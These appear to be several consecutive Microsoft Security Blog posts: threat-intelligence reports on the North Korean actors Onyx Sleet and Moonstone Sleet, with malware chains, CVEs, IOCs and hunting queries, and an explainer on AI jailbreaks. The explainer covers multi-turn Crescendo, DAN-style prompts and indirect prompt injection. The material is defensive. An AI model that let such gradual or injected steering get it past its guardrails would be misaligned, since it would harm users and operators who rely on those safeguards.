To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Peach Sandstorm deploys new custom Tickler malware in long-running intelligence gathering operations appeared first on Microsoft Security Blog.

First observed by Microsoft in 2014, Onyx Sleet has conducted cyber espionage through numerous campaigns aimed at global targets with the goal of intelligence gathering. More recently, it has expanded its goals to include financial gain. This threat actor operates with an extensive set of custom tools and malware, and regularly evolves its toolset to add new functionality and to evade detection, while keeping a fairly uniform attack pattern. Onyx Sleet’s ability to develop a spectrum of tools to launch its tried-and-true attack chain makes it a persistent threat, particularly to targets of interest to North Korean intelligence, like organizations in the defense, engineering, and energy sectors.

Microsoft tracks campaigns related to Onyx Sleet and directly notifies customers who have been targeted or compromised, providing them with the necessary information to help secure their environments. In this blog, we will share intelligence about Onyx Sleet and its historical tradecraft and targets, as well as our analysis of recent malware campaigns, with the goal of enabling the broader community to identify and respond to similar campaigns. We also provide protection, detection, and hunting guidance to help improve defenses against these attacks.

Who is Onyx Sleet?

Onyx Sleet conducts cyber espionage primarily targeting military, defense, and technology industries, predominately in India, South Korea, and the United States. This threat actor has historically leveraged spear-phishing as a means of compromising target environments; however, in recent campaigns, they have mostly exploited N-day vulnerabilities, leveraging publicly available and custom exploits to gain initial access. In October 2023, Onyx Sleet exploited the TeamCity CVE-2023-42793 vulnerability as a part of a targeted attack. Exploiting this vulnerability enabled the threat actor to perform a remote code execution attack and gain administrative control of the server.

Onyx Sleet develops and uses a spectrum of tools that range from custom to open source. They have built an extensive set of custom remote access trojans (RATs) that they use in campaigns, and routinely developed new variants of these RATs to add new functionality and implement new ways of evading detection. Onyx Sleet often uses leased virtual private servers (VPS) and compromised cloud infrastructure for command-and-control (C2).

Onyx Sleet is tracked by other security companies as APT45, SILENT CHOLLIMA, Andariel, DarkSeoul, Stonefly, and TDrop2.

Affiliations with other threat actors originating from North Korea

Onyx Sleet has demonstrated affiliations with other North Korean actors, indicating its integration with a broader network of North Korean cyber operations. Microsoft has observed an overlap between Onyx Sleet and Storm-0530. Both groups were observed operating within the same infrastructure and were involved in the development and use of ransomware in attacks in late 2021 and 2022.

Onyx Sleet targets

In pursuit of its primary goal of intelligence collection, Onyx Sleet has focused on targeting entities in the defense and energy industries, predominately in India, South Korea, and the United States. Recent attacks include the targeting of South Korean educational institutions, construction companies, and manufacturing organizations in May 2024. Onyx Sleet has also shown interest in taking advantage of online gambling websites, possibly for financial gain either on behalf of North Korea or for individual members of the group.

Onyx Sleet tradecraft

Onyx Sleet has used the same tactics, techniques, and procedures (TTPs) over extended periods, suggesting the threat actor views its tradecraft as effective. Onyx Sleet historically leveraged spear-phishing to compromise targets, and in more recent campaigns, they have been observed to primarily use exploits for initial access, alongside a loader, downloader, and backdoor as a part of its well-established attack chain.

Onyx Sleet nevertheless made some changes, for example, adding new C2 servers and hosting IPs, creating new malware, and launching multiple campaigns over time. In the past, Onyx Sleet introduced custom ransomware strains as a part of its campaigns. It also created and deployed the RAT identified by Kaspersky as Dtrack, which was observed in global attacks from September 2019 to January 2024. The Dtrack RAT follows the common attack chain used by Onyx Sleet and includes the exploitation of the Log4j 2 CVE-2021-44228 vulnerability for initial access and the use of payloads signed with an invalid certificate masquerading as legitimate software to evade detection.

Another example of Onyx Sleet introducing variations in the implementation of its attack chain is the campaign identified by AhnLab Security Intelligence Center (ASEC) in May 2024. In this campaign, the threat actor employed a previously unseen malware family dubbed as Dora RAT. Developed in the Go programming language, this custom malware strain targeted South Korean educational institutions, construction companies, and manufacturing organizations. 

Onyx Sleet avoids common detection techniques across its attack lifecycle by heavily using custom encryption and obfuscation algorithms and launching as much of its code in memory as possible. These tools and techniques have been observed in several reported campaigns, including TDrop2.

Onyx Sleet has also used several off-the shelf tools, including Sliver, remote monitoring and management (RMM) tools SOCKS proxy tools, Ngrok, and masscan. We have also observed Onyx Sleet using commercial packers like Themida and VMProtect to obfuscate their malware. In January 2024, Microsoft Threat Intelligence identified a campaign attributed to Onyx Sleet that deployed a Sliver implant, an open-source C2 framework that supports multiple operators, listener types, and payload generation. Like the Dtrack RAT, this malware was signed with an invalid certificate impersonating Tableau software. Further analysis revealed that this Onyx Sleet campaign compromised multiple aerospace and defense organizations from October 2023 to June 2024.

Apart from the previously mentioned Log4j 2 vulnerability, Onyx Sleet has exploited other publicly disclosed (N-day) vulnerabilities to gain access to target environments. Some vulnerabilities recently exploited by Onyx Sleet include:

• CVE-2023-46604 (Apache ActiveMQ)
• CVE-2023-22515 (Confluence)
• CVE-2023-27350 (PaperCut)
• CVE-2023-42793 (TeamCity)

In addition to these well-known and disclosed vulnerabilities, Onyx Sleet has used custom exploit capabilities in campaigns targeting users mostly in South Korea. In these campaigns, Onyx Sleet exploited vulnerabilities in a remote desktop/management application, a data loss prevention application, a network access control system, and an endpoint detection and response (EDR) product.

Recent malware campaigns

In December 2023, South Korean authorities attributed attacks that stole over 1.2 TB of data from targeted South Korean defense contractors using custom malware to Andariel. Microsoft has attributed several custom malware families used in the said attacks – TigerRAT, SmallTiger, LightHand, and ValidAlpha – to Onyx Sleet.

TigerRAT

Since 2020, Onyx Sleet has been observed using the custom RAT malware TigerRAT. In some campaigns using TigerRAT, Onyx Sleet exploited vulnerabilities in Log4j 2 to deliver and install the malware. When launched, this malware can steal confidential information and carry out commands, such as keylogging and screen recording, from the C2.

SmallTiger

In February 2024, ASEC identified SmallTiger, a new malware strain targeting South Korean defense and manufacturing organizations. During the process of lateral movement, this malware is delivered as a DLL file (SmallTiger[.]dll) and uses a C2 connection to download and launch the payload into memory. Microsoft researchers have determined that SmallTiger is a C++ backdoor with layered obfuscation, encountered in the wild as a Themida or VMProtect packed executable.

The SmallTiger campaign can be tied back to a campaign using a similar attack chain beginning in November 2023 that delivered the DurianBeacon RAT malware. In May 2024, Microsoft observed Onyx Sleet continuing to conduct attacks targeting South Korean defense organizations using SmallTiger.

LightHand

LightHand is a custom, lightweight backdoor used by Onyx Sleet for remote access of target devices. Via LightHand, Onyx Sleet can execute arbitrary commands through command shell (cmd.exe), get system storage information, perform directory listing, and create/delete files on the target device.

ValidAlpha (BlackRAT)

ValidAlpha (also known as BlackRAT) is a custom backdoor developed in the Go programming language and used by Onyx Sleet to target organizations globally in the energy, defense, and engineering sectors since at least 2023. ValidAlpha can run an arbitrary file, list contents of a directory, download a file, take screenshots, and launch a shell to execute arbitrary commands.

Samples of ValidAlpha analyzed by Microsoft had a unique PDB string: I:/01___Tools/02__RAT/Black/Client_Go/Client.go

Recommendations

Microsoft recommends the following mitigations to defend against attacks by Onyx Sleet:

• Keep software up to date. Apply new security patches as soon as possible.
• Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to help cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
• Enable network protection to help prevent access to malicious domains.
• Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can help block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to help remediate malicious artifacts that are detected post-breach.
• Configure investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to help resolve breaches, significantly reducing alert volume

Microsoft Defender customers can turn on attack surface reduction rules to help prevent common attack techniques used by Onyx Sleet:

• Block executable files from running unless they meet a prevalence, age, or trusted list criterion
• Block execution of potentially obfuscated scripts
• Block JavaScript or VBScript from launching downloaded, executable content

Detection details

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects threat components as the following malware families:

• CertutilPE
• Dora
• LightHand
• SmallTiger
• TigerCrypt
• TigerRAT
• ValidAlpha

Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alerts can indicate associated threat activity:

• Onyx Sleet activity group

The following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity:

• Document contains macro to download a file

Microsoft Defender Vulnerability Management

Microsoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:

• CVE-2023-42793 (TeamCity)
• CVE-2023-27350 (Papercut)
• CVE-2021-44228 (Log4j 2)

Microsoft Defender Threat Intelligence

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

• Tool Profile: Dtrack
• Onyx Sleet targeting defense firm in the Middle East
• Onyx Sleet targets electrical equipment manufacturer in India
• Onyx Sleet exploits vulnerable VMWare Horizon servers
• Onyx Sleet using Sliver remote access trojan in attacks on aerospace and defense
• Same Targets, new playbooks: East Asia threat actors employ unique methods

Microsoft Sentinel queries

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Use this query to assess the existence of vulnerabilities used by Onyx Sleet:

DeviceTvmSoftwareVulnerabilities  
| where CveId in ("CVE-2021-44228","CVE-2023-27350","CVE-2023-42793")   
| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,  
CveId,VulnerabilitySeverityLevel  
| join kind=inner ( DeviceTvmSoftwareVulnerabilitiesKB | project CveId, CvssScore,IsExploitAvailable,VulnerabilitySeverityLevel,PublishedDate,VulnerabilityDescription,AffectedSoftware ) on CveId  
| project DeviceId,DeviceName,OSPlatform,OSVersion,SoftwareVendor,SoftwareName,SoftwareVersion,  
CveId,VulnerabilitySeverityLevel,CvssScore,IsExploitAvailable,PublishedDate,VulnerabilityDescription,AffectedSoftware 

Use this query to detect associated network IOCs:

let remoteip = dynamic(["84.38.134.56","45.155.37.101","213.139.205.151","109.248.150.147","162.19.71.175","147.78.149.201"]);
let remoteurl = dynamic(["americajobmail.site","privatemake.bounceme.net","ww3c.bounceme.net","advice.uphearth.com","http://84.38.134.56/procdump.gif"]);
DeviceNetworkEvents  
| where RemoteIP == remoteip or RemoteUrl == remoteurl 
| project TimeGenerated, DeviceId, DeviceName, Protocol, LocalIP, LocalIPType, LocalPort,RemoteIP, RemoteIPType, RemotePort, RemoteUrl

Use this query to detect associated file IOCs:

let selectedTimestamp = datetime(2024-07-17T00:00:00.0000000Z);  
let fileName = "SmallTiger.dll";  
let FileSHA256 = dynamic(["f32f6b229913d68daad937cc72a57aa45291a9d623109ed48938815aa7b6005c","0837dd54268c373069fc5c1628c6e3d75eb99c3b3efc94c45b73e2cf9a6f3207 ","29c6044d65af0073424ccc01abcb8411cbdc52720cac957a3012773c4380bab3","fed94f461145681dc9347b382497a72542424c64b6ae6fcf945f4becd2d46c32","868a62feff8b46466e9d63b83135a7987bf6d332c13739aa11b747b3e2ad4bbf","f1662bee722a4e25614ed30933b0ced17b752d99fae868fbb326a46afa2282d5","1b88b939e5ec186b2d19aec8f17792d493d74dd6ab3d5a6ddc42bfe78b01aff1","3098e6e7ae23b3b8637677da7bfc0ba720e557e6df71fa54a8ef1579b6746061","8daa6b20caf4bf384cc7912a73f243ce6e2f07a5cb3b3e95303db931c3fe339f","7339cfa5a67f5a4261c18839ef971d7f96eaf60a46190cab590b439c71c4742b"]);  
let SignerName = "INVALID:Tableau Software Inc.";  
let Signerhash = "6624c7b8faac176d1c1cb10b03e7ee58a4853f91";  
let certificateserialnumber = "76cb5d1e6c2b6895428115705d9ac765";  
search in (AlertEvidence,BehaviorEntities,CommonSecurityLog,DeviceBaselineComplianceProfiles,DeviceEvents,DeviceFileEvents,DeviceImageLoadEvents,  
DeviceLogonEvents,DeviceNetworkEvents,DeviceProcessEvents,DeviceRegistryEvents,DeviceFileCertificateInfo,DynamicEventCollection,EmailAttachmentInfo,OfficeActivity,SecurityEvent,ThreatIntelligenceIndicator)  
TimeGenerated between ((selectedTimestamp - 1m) .. (selectedTimestamp + 90d)) // from July 17th runs the search backwards for 90 days, change the above date accordingly.  
and   
( FileName == fileName or OldFileName == fileName or ProfileName == fileName or InitiatingProcessFileName == fileName or InitiatingProcessParentFileName == fileName  
or InitiatingProcessVersionInfoInternalFileName == fileName or InitiatingProcessVersionInfoOriginalFileName == fileName or PreviousFileName == fileName  
or ProcessVersionInfoInternalFileName == fileName or ProcessVersionInfoOriginalFileName == fileName or DestinationFileName == fileName or SourceFileName == fileName  
or ServiceFileName == fileName or SHA256 in (FileSHA256) or InitiatingProcessSHA256 in (FileSHA256) or Signer == SignerName or SignerHash == Signerhash or CertificateSerialNumber == certificateserialnumber )

Indicators of compromise

IP addresses

• 84.38.134[.]56
• 45.155.37[.]101
• 213.139.205[.]151
• 109.248.150[.]147
• 162.19.71[.]175
• 147.78.149[.]201

URL

• hxxp://84.38.134[.]56/procdump.gif

Actor-controlled domain

• americajobmail[.]site
• privatemake.bounceme[.]net
• ww3c.bounceme[.]net
• advice.uphearth[.]com

SHA-256

• TigerRAT
  • f32f6b229913d68daad937cc72a57aa45291a9d623109ed48938815aa7b6005c
  • 0837dd54268c373069fc5c1628c6e3d75eb99c3b3efc94c45b73e2cf9a6f3207
  • 29c6044d65af0073424ccc01abcb8411cbdc52720cac957a3012773c4380bab3
  • fed94f461145681dc9347b382497a72542424c64b6ae6fcf945f4becd2d46c32
  • 868a62feff8b46466e9d63b83135a7987bf6d332c13739aa11b747b3e2ad4bbf
• LightHand
  • f1662bee722a4e25614ed30933b0ced17b752d99fae868fbb326a46afa2282d5
  • 1b88b939e5ec186b2d19aec8f17792d493d74dd6ab3d5a6ddc42bfe78b01aff1
  • 3098e6e7ae23b3b8637677da7bfc0ba720e557e6df71fa54a8ef1579b6746061
  • 8daa6b20caf4bf384cc7912a73f243ce6e2f07a5cb3b3e95303db931c3fe339f
  • 7339cfa5a67f5a4261c18839ef971d7f96eaf60a46190cab590b439c71c4742b
• ValidAlpha
  • c2500a6e12f22b16e221ba01952b69c92278cd05632283d8b84c55c916efe27c
  • c1a09024504a5ec422cbea68e17dffc46472d3c2d73f83aa0741a89528a45cd1

Fake Tableau certificate

• Signer: INVALID:Tableau Software Inc.
• SignerHash: 6624c7b8faac176d1c1cb10b03e7ee58a4853f91
• CertificateSerialNumber: 76cb5d1e6c2b6895428115705d9ac765

References

• https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/
• https://asec.ahnlab.com/en/66088/
• https://www.helpnetsecurity.com/2013/07/08/dissecting-operation-troy-cyberespionage-in-south-korea/
• https://unit42.paloaltonetworks.com/inside-tdrop2-technical-analysis-of-new-dark-seoul-malware/
• https://securelist.com/my-name-is-dtrack/93338/
• https://www.virustotal.com/gui/file/96118268f9ab475860c3ae3edf00d9ee944d6440fd60a1673f770d150bfb16d3/details
• https://www.reuters.com/technology/cybersecurity/north-korea-hackers-may-have-stolen-data-laser-weapon-police-2023-12-06/
• https://asec.ahnlab.com/en/56405/
• https://blog.talosintelligence.com/lazarus-magicrat/
• https://asec.ahnlab.com/ko/65918/
• https://www.boho.or.kr/en/bbs/view.do?searchCnd=&bbsId=B0001041&searchWrd=&menuNo=205083&pageIndex=1&categoryCode=&nttId=36276

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post Onyx Sleet uses array of malware to gather intelligence for North Korea appeared first on Microsoft Security Blog.

What is AI jailbreak?

An AI jailbreak is a technique that can cause the failure of guardrails (mitigations). The resulting harm comes from whatever guardrail was circumvented: for example, causing the system to violate its operators’ policies, make decisions unduly influenced by one user, or execute malicious instructions. This technique may be associated with additional attack techniques such as prompt injection, evasion, and model manipulation. You can learn more about AI jailbreak techniques in our AI red team’s Microsoft Build session, How Microsoft Approaches AI Red Teaming.

Here is an example of an attempt to ask an AI assistant to provide information about how to build a Molotov cocktail (firebomb). We know this knowledge is built into most of the generative AI models available today, but is prevented from being provided to the user through filters and other techniques to deny this request. Using a technique like Crescendo, however, the AI assistant can produce the harmful content that should otherwise have been avoided. This particular problem has since been addressed in Microsoft’s safety filters; however, AI models are still susceptible to it. Many variations of these attempts are discovered on a regular basis, then tested and mitigated.

Why is generative AI susceptible to this issue?

When integrating AI into your applications, consider the characteristics of AI and how they might impact the results and decisions made by this technology. Without anthropomorphizing AI, the interactions are very similar to the issues you might find when dealing with people. You can consider the attributes of an AI language model to be similar to an eager but inexperienced employee trying to help your other employees with their productivity:

1. Over-confident: They may confidently present ideas or solutions that sound impressive but are not grounded in reality, like an overenthusiastic rookie who hasn’t learned to distinguish between fiction and fact.
2. Gullible: They can be easily influenced by how tasks are assigned or how questions are asked, much like a naïve employee who takes instructions too literally or is swayed by the suggestions of others.
3. Wants to impress: While they generally follow company policies, they can be persuaded to bend the rules or bypass safeguards when pressured or manipulated, like an employee who may cut corners when tempted.
4. Lack of real-world application: Despite their extensive knowledge, they may struggle to apply it effectively in real-world situations, like a new hire who has studied the theory but may lack practical experience and common sense.

In essence, AI language models can be likened to employees who are enthusiastic and knowledgeable but lack the judgment, context understanding, and adherence to boundaries that come with experience and maturity in a business setting.

So we can say that generative AI models and system have the following characteristics:

• Imaginative but sometimes unreliable
• Suggestible and literal-minded, without appropriate guidance
• Persuadable and potentially exploitable
• Knowledgeable yet impractical for some scenarios

Without the proper protections in place, these systems can not only produce harmful content, but could also carry out unwanted actions and leak sensitive information.

Due to the nature of working with human language, generative capabilities, and the data used in training the models, AI models are non-deterministic, i.e., the same input will not always produce the same outputs. These results can be improved in the training phases, as we saw with the results of increased resilience in Phi-3 based on direct feedback from our AI Red Team. As all generative AI systems are subject to these issues, Microsoft recommends taking a zero-trust approach towards the implementation of AI; assume that any generative AI model could be susceptible to jailbreaking and limit the potential damage that can be done if it is achieved. This requires a layered approach to mitigate, detect, and respond to jailbreaks. Learn more about our AI Red Team approach.

What is the scope of the problem?

When an AI jailbreak occurs, the severity of the impact is determined by the guardrail that it circumvented. Your response to the issue will depend on the specific situation and if the jailbreak can lead to unauthorized access to content or trigger automated actions. For example, if the harmful content is generated and presented back to a single user, this is an isolated incident that, while harmful, is limited. However, if the jailbreak could result in the system carrying out automated actions, or producing content that could be visible to more than the individual user, then this becomes a more severe incident. As a technique, jailbreaks should not have an incident severity of their own; rather, severities should depend on the consequence of the overall event (you can read about Microsoft’s approach in the AI bug bounty program).

Here are some examples of the types of risks that could occur from an AI jailbreak:

• AI safety and security risks:
  • Unauthorized data access
  • Sensitive data exfiltration
  • Model evasion
  • Generating ransomware
  • Circumventing individual policies or compliance systems
• Responsible AI risks:
  • Producing content that violates policies (e.g., harmful, offensive, or violent content)
  • Access to dangerous capabilities of the model (e.g., producing actionable instructions for dangerous or criminal activity)
  • Subversion of decision-making systems (e.g., making a loan application or hiring system produce attacker-controlled decisions)
  • Causing the system to misbehave in a newsworthy and screenshot-able way
  • IP infringement

How do AI jailbreaks occur?

The two basic families of jailbreak depend on who is doing them:

• A “classic” jailbreak happens when an authorized operator of the system crafts jailbreak inputs in order to extend their own powers over the system.
• Indirect prompt injection happens when a system processes data controlled by a third party (e.g., analyzing incoming emails or documents editable by someone other than the operator) who inserts a malicious payload into that data, which then leads to a jailbreak of the system.

You can learn more about both of these types of jailbreaks here.

There is a wide range of known jailbreak-like attacks. Some of them (like DAN) work by adding instructions to a single user input, while others (like Crescendo) act over several turns, gradually shifting the conversation to a particular end. Jailbreaks may use very “human” techniques such as social psychology, effectively sweet-talking the system into bypassing safeguards, or very “artificial” techniques that inject strings with no obvious human meaning, but which nonetheless could confuse AI systems. Jailbreaks should not, therefore, be regarded as a single technique, but as a group of methodologies in which a guardrail can be talked around by an appropriately crafted input.

Mitigation and protection guidance

To mitigate the potential of AI jailbreaks, Microsoft takes defense in depth approach when protecting our AI systems, from models hosted on Azure AI to each Copilot solution we offer. When building your own AI solutions within Azure, the following are some of the key enabling technologies that you can use to implement jailbreak mitigations:

• Prompt filtering: Prompt Shields in Azure AI Content Safety
• Identity management: Managed identities for Azure resources
• Data access controls: Microsoft Purview data security for generative AI apps   
• System metaprompt: System message framework and template recommendations for large language models (LLMs)
• Content filtering: Azure OpenAI Service content filtering
• Abuse monitoring: Azure OpenAI Service abuse monitoring
• Model alignment during training: Microsoft Azure AI Fundamentals: Generative AI – Training
• Threat protection: Microsoft Defender for Cloud threat protection for AI workloads

With layered defenses, there are increased chances to mitigate, detect, and appropriately respond to any potential jailbreaks.

To empower security professionals and machine learning engineers to proactively find risks in their own generative AI systems, Microsoft has released an open automation framework, Python Risk Identification Toolkit for generative AI (PyRIT). Read more about the release of PyRIT for generative AI Red teaming, and access the PyRIT toolkit on GitHub.

When building solutions on Azure AI, use the Azure AI Studio capabilities to build benchmarks, create metrics, and implement continuous monitoring and evaluation for potential jailbreak issues.

If you discover new vulnerabilities in any AI platform, we encourage you to follow responsible disclosure practices for the platform owner. Microsoft’s procedure is explained here: Microsoft AI Bounty Program.

Detection guidance

Microsoft builds multiple layers of detections into each of our AI hosting and Copilot solutions.

To detect attempts of jailbreak in your own AI systems, you should ensure you have enabled logging and are monitoring interactions in each component, especially the conversation transcripts, system metaprompt, and the prompt completions generated by the AI model.

Microsoft recommends setting the Azure AI Content Safety filter severity threshold to the most restrictive options, suitable for your application. You can also use Azure AI Studio to begin the evaluation of your AI application safety with the following guidance: Evaluation of generative AI applications with Azure AI Studio.

Summary

This article provides the foundational guidance and understanding of AI jailbreaks. In future blogs, we will explain the specifics of any newly discovered jailbreak techniques. Each one will articulate the following key points:

1. We will describe the jailbreak technique discovered and how it works, with evidential testing results.
2. We will have followed responsible disclosure practices to provide insights to the affected AI providers, ensuring they have suitable time to implement mitigations.
3. We will explain how Microsoft’s own AI systems have been updated to implement mitigations to the jailbreak.
4. We will provide detection and mitigation information to assist others to implement their own further defenses in their AI systems.

Richard Diver
Microsoft Security

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn at https://www.linkedin.com/showcase/microsoft-threat-intelligence, and on X (formerly Twitter) at https://twitter.com/MsftSecIntel.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast: https://thecyberwire.com/podcasts/microsoft-threat-intelligence.

The post AI jailbreaks: What they are and how they can be mitigated appeared first on Microsoft Security Blog.

Moonstone Sleet uses tactics, techniques, and procedures (TTPs) also used by other North Korean threat actors over the last several years, highlighting the overlap among these groups. While Moonstone Sleet initially had overlaps with Diamond Sleet, the threat actor has since shifted to its own infrastructure and attacks, establishing itself as a distinct, well-resourced North Korean threat actor.

This blog describes several notable TTPs used by this threat actor as well as recommendations to defend against related attacks. As with any observed nation-state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the necessary information to secure their environments.

Who is Moonstone Sleet?

Moonstone Sleet is a threat actor behind a cluster of malicious activity that Microsoft assesses is North Korean state-aligned and uses both a combination of many tried-and-true techniques used by other North Korean threat actors and unique attack methodologies. When Microsoft first detected Moonstone Sleet activity, the actor demonstrated strong overlaps with Diamond Sleet, extensively reusing code from known Diamond Sleet malware like Comebacker and using well-established Diamond Sleet techniques to gain access to organizations, such as using social media to deliver trojanized software. However, Moonstone Sleet quickly shifted to its own bespoke infrastructure and attacks. Subsequently, Microsoft has observed Moonstone Sleet and Diamond Sleet conducting concurrent operations, with Diamond Sleet still utilizing much of its known, established tradecraft.

Moonstone Sleet has an expansive set of operations supporting its financial and cyberespionage objectives. These range from deploying custom ransomware to creating a malicious game, setting up fake companies, and using IT workers.

Moonstone Sleet tradecraft

Microsoft has observed Moonstone Sleet using the TTPs discussed in the following sections in various campaigns.

Trojanized PuTTY

In early August 2023, Microsoft observed Moonstone Sleet delivering a trojanized version of PuTTY, an open-source terminal emulator, via apps like LinkedIn and Telegram as well as developer freelancing platforms. Often, the actor sent targets a .zip archive containing two files: a trojanized version of putty.exe and url.txt, which contained an IP address and a password. If the provided IP and password were entered by the user into the PuTTY application, the application would decrypt an embedded payload, then load and execute it. Notably, before Moonstone Sleet used this initial access vector, Microsoft observed Diamond Sleet using a similar method – trojanized PuTTY and SumatraPDF — with comparable techniques for anti-analysis, as we reported in 2022:

The trojanized PuTTY executable drops a custom installer which kicks off execution of a series of stages of malware, as described below:

1. Stage 1 – Trojanized PuTTY: Decrypts, decompresses, and then executes the embedded stage 2 payload.
2. Stage 2 – SplitLoader installer/dropper: Decrypts, decompresses, and writes the Stage 3 payload, the SplitLoader DLL file, to disk. The installer also drops two encrypted files to disk, then executes SplitLoader via a scheduled task or registry run key.
3. Stage 3 – SplitLoader:Decrypts and decompresses the two encrypted files dropped by the stage 2 payload, then combines them to create the next-stage, another portable executable (PE) file.
4. Stage 4 – Trojan loader: Expects a compressed and encrypted PE file from the C2. Once received, the trojan loader decompresses, decrypts, and executes this file.

Microsoft has also observed Moonstone Sleet using other custom malware loaders delivered by PuTTY that behaved similarly and had argument overlap with previously observed Diamond Sleet malware artifacts, such as the following:

Malicious npm packages

Microsoft has observed Moonstone Sleet targeting potential victims with projects that used malicious npm packages. Often, the threat actor delivered these projects through freelancing websites or other platforms like LinkedIn. In one example, the threat actor used a fake company to send .zip files invoking a malicious npm package under the guise of a technical skills assessment. When loaded, the malicious package used curl to connect to an actor-controlled IP and drop additional malicious payloads like SplitLoader. In another incident, Moonstone Sleet delivered a malicious npm loader which led to credential theft from LSASS. Microsoft collaborated with GitHub to identify and remove repositories associated with this activity.

Malicious tank game

Since February 2024, Microsoft has observed Moonstone Sleet infecting devices using a malicious tank game it developed called DeTankWar (also called DeFiTankWar, DeTankZone, or TankWarsZone). DeTankWar is a fully functional downloadable game that requires player registration, including username/password and invite code. In this campaign, Moonstone Sleet typically approaches its targets through messaging platforms or by email, presenting itself as a game developer seeking investment or developer support and either masquerading as a legitimate blockchain company or using fake companies. To bolster the game’s superficial legitimacy, Moonstone Sleet has also created a robust public campaign that includes the websites detankwar[.]com and defitankzone[.]com, and many X (Twitter) accounts for the personas it uses to approach targets and for the game itself.

Moonstone Sleet used a fake company called C.C. Waterfall to contact targets. The email presented the game as a blockchain-related project and offered the target the opportunity to collaborate, with a link to download the game included in the body of the message. More details about C.C. Waterfall and another fake company that Moonstone Sleet set up to trick targets are included below:

When targeted users launch the game, delfi-tank-unity.exe, additional included malicious DLLs are also loaded. The payload is a custom malware loader that Microsoft tracks as YouieLoad. Similarly to SplitLoader, YouieLoad loads malicious payloads in memory and creates malicious services that perform functions such as network and user discovery and browser data collection. For compromised devices of particular interest to the group, the threat actor launches hands-on-keyboard commands with further discovery and conducts credential theft.

Ransomware

In April 2024, Microsoft observed Moonstone Sleet delivering a new custom ransomware variant we have named FakePenny against a company it previously compromised in February. FakePenny includes a loader and an encryptor. Although North Korean threat actor groups have previously developed custom ransomware, this is the first time we have observed this threat actor deploying ransomware.

Microsoft assesses that Moonstone Sleet’s objective in deploying the ransomware is financial gain, suggesting the actor conducts cyber operations for both intelligence collection and revenue generation. Of note, the ransomware note dropped by FakePenny closely overlaps with the note used by Seashell Blizzard in its malware NotPetya. The ransom demand was $6.6M USD in BTC. This is in stark contrast to the lower ransom demands of previous North Korea ransomware attacks, like WannaCry 2.0 and H0lyGh0st.

Fake companies

Since January 2024, Microsoft has observed Moonstone Sleet creating several fake companies impersonating software development and IT services, typically relating to blockchain and AI. The actor has used these companies to reach out to potential targets, using a combination of created websites and social media accounts to add legitimacy to their campaigns.

StarGlow Ventures

From January to April 2024, Moonstone Sleet’s fake company StarGlow Ventures posed as a legitimate software development company. The group used a custom domain, fake employee personas, and social media accounts, in an email campaign targeting thousands of organizations in the education and software development sectors. In the emails Moonstone Sleet sent as part of this campaign, the actor complimented the work of the targeted organization and offered collaboration and support for upcoming projects, citing expertise in the development of web apps, mobile apps, blockchain, and AI.

These emails also contained a 1×1 tracking pixel, which likely enabled Moonstone Sleet to track which targets engaged with the emails, and a link to a dummy unsubscribe page hosted on the StarGlow Ventures domain. While the emails did not contain any malicious links, Microsoft assesses Moonstone Sleet likely used this campaign to establish a relationship with target organizations. Although the purpose of these relationships is unclear, they may afford the actor access to organizations of interest or be used as revenue generation opportunities. Microsoft notified customers who were impacted by this Moonstone Sleet campaign.

C.C. Waterfall

In a similar campaign, Moonstone Sleet sent emails using its fake company C.C. Waterfall, a purported IT consulting organization.

In this campaign, Moonstone Sleet emailed higher education organizations, claiming the company was either hiring new developers or looking for business collaboration opportunities. This campaign likely had similar goals to the StarGlow Ventures campaign: to build relationships with organizations which could be leveraged for revenue generation or malicious access.  

As previously mentioned, Moonstone Sleet also used C.C. Waterfall to contact targets and invite them to download the actor’s tank game, highlighting that this is a coordinated and concerted effort for which Moonstone Sleet can leverage multiple facets of its operations in overlapping campaigns.

Work-for-hire

In addition to creating fake companies, Microsoft has observed Moonstone Sleet pursuing employment in software development positions at multiple legitimate companies. This activity could be consistent with previous reporting from the United States Department of Justice that North Korea was using highly skilled remote IT workers to generate revenue. On the other hand, this Moonstone Sleet activity may also be another approach to gaining access to organizations.

Moonstone Sleet targets

